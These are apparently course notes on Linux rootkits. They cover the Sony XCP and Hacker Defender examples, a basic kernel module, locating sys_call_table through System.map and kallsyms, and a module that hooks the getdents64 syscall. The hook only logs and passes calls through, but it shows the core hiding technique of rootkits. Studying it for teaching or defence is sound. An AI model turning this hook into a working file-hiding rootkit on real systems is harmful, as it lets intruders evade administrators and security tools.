Notes from CPNT-260 at SAIT.

Set of code that allows someone to control aspects of the host operating system without revealing its presence. - Joseph Kong, Designing BSD Rootkits

A rootkit gives you the ability to hide files, processes and programs as if they were never installed on the computer. It can be used to:

In 2005, Sony published music CDs with copy-protection software called "Extended Copy Protection (XCP)". It was installed automatically after the user accepted the EULA. Files, processes, registry keys and directories whose names started with $sys$ were made 'invisible'. The same technique was later used by actual malware (Breplibot).

Hacker Defender (hxdef) is a rootkit for Microsoft Windows operating systems. It enables processes, files and registry keys to be hidden from system administrators and security scanning tools.

Kernel modules

Used for:

Loadable kernel modules are much faster to maintain and debug, because they can be rebuilt and reloaded without rebooting. They are not much slower than code compiled into the base kernel.

hellomod.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
MODULE_LICENSE("Dual BSD/GPL");

static int __init hello_start(void)
{
  printk(KERN_INFO "Loading module...\n");
  return 0;
}

static void __exit hello_end(void)
{
  printk(KERN_INFO "goodbye\n");
}

module_init(hello_start);
module_exit(hello_end);
Makefile (recipe lines must be indented with a tab, not spaces):

obj-m += hellomod.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Build, load, watch the kernel log, unload, and confirm the module is gone:

$ make
$ sudo insmod ./hellomod.ko
$ tail -F /var/log/messages
$ sudo rmmod hellomod
$ lsmod

Hooking

Hooking is a programming technique that employs handler functions to modify control flow. When applied to system calls, this technique is often called “syscall hijacking”.

Locating the address of the syscall table in memory, from the kernel's symbol map:

$ sudo cat /boot/System.map-`uname -r` | grep sys_call_table
ffffffff8170b180 R sys_call_table
ffffffff8170bd80 R ia32_sys_call_table

Or from the running kernel's symbol list:

$ sudo cat /proc/kallsyms | grep sys_call_table
ffffffff8170b180 R sys_call_table
ffffffff8170bd80 R ia32_sys_call_table
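The module further down hardcodes the sys_call_table address taken from the listing above. If that address does not match the running kernel (a different kernel build, or a kernel with address-space randomisation), the write in the module lands on the wrong memory, and if kernel.kptr_restrict is set the listing shows all-zero addresses. This is an added example, not part of the course notes: a POSIX shell check that parses kallsyms-style text (the sample lines are constructed) and reports whether a hardcoded address is safe to use.

```shell
#!/bin/sh
# Constructed sample in /proc/kallsyms format (not captured from a real host).
# On a live system the input would come from: sudo cat /proc/kallsyms
SAMPLE_KALLSYMS='ffffffff8170b180 R sys_call_table
ffffffff8170bd80 R ia32_sys_call_table'

# Constructed sample of what a reader sees when kernel.kptr_restrict hides addresses.
SAMPLE_RESTRICTED='0000000000000000 R sys_call_table
0000000000000000 R ia32_sys_call_table'

# lookup_symbol "<kallsyms text>" <symbol>
# Prints the address of an exact symbol-name match (column 3); prints nothing if absent.
lookup_symbol() {
    printf '%s\n' "$1" | awk -v sym="$2" '$3 == sym { print $1; exit }'
}

# check_table_address "<kallsyms text>" <hex address hardcoded in the module>
# Exit status: 0 = match, 1 = mismatch, 2 = address hidden by kptr_restrict,
# 3 = symbol not listed at all (e.g. sys_call_table not exported by this kernel).
check_table_address() {
    live=$(lookup_symbol "$1" sys_call_table)
    [ -n "$live" ] || { echo "sys_call_table is not listed"; return 3; }
    case "$live" in
        0000000000000000)
            echo "address hidden by kernel.kptr_restrict; read the file as root"
            return 2 ;;
    esac
    if [ "$live" = "$2" ]; then
        echo "match: $live"
        return 0
    fi
    echo "mismatch: module hardcodes $2 but the running kernel has $live"
    return 1
}
```

The same function works on real output by replacing the sample string with `$(sudo cat /proc/kallsyms)`.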

Let's see if we can hook a syscall. The module below replaces the getdents64 entry in the syscall table with a wrapper that logs a line and then calls the original handler.

hellomod.c:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <asm/unistd.h>
#include <linux/syscalls.h>

MODULE_LICENSE("Dual BSD/GPL");

/* Address of sys_call_table taken from System.map / kallsyms above.
 * It must match the running kernel; on kernels that map the table read-only
 * the assignment below faults. */
unsigned long *table = (unsigned long *)0xffffffff8170b180;

/* Saved pointer to the original getdents64 handler. */
asmlinkage long (*o_getdents)(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

/* Replacement handler: log, then hand off to the original. */
asmlinkage long our_getdents(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
  printk(KERN_INFO "Hook: we're in.\n");
  return o_getdents(fd, dirp, count);
}

static int __init hello_start(void)
{
  printk(KERN_INFO "Loading module...\n");
  /* Sanity check that the address really is the syscall table:
   * the close entry should point at sys_close. */
  if (table[__NR_close] == (unsigned long) sys_close) {
    printk(KERN_INFO "Found it\n");
    o_getdents = (void *) table[__NR_getdents64];
    table[__NR_getdents64] = (unsigned long) our_getdents;
    return 0;
  }

  printk(KERN_INFO "Not Found\n");
  return -1;
}

static void __exit hello_end(void)
{
  /* Restore the original entry before the module code disappears. */
  table[__NR_getdents64] = (unsigned long) o_getdents;
  printk(KERN_INFO "goodbye\n");
}

module_init(hello_start);
module_exit(hello_end);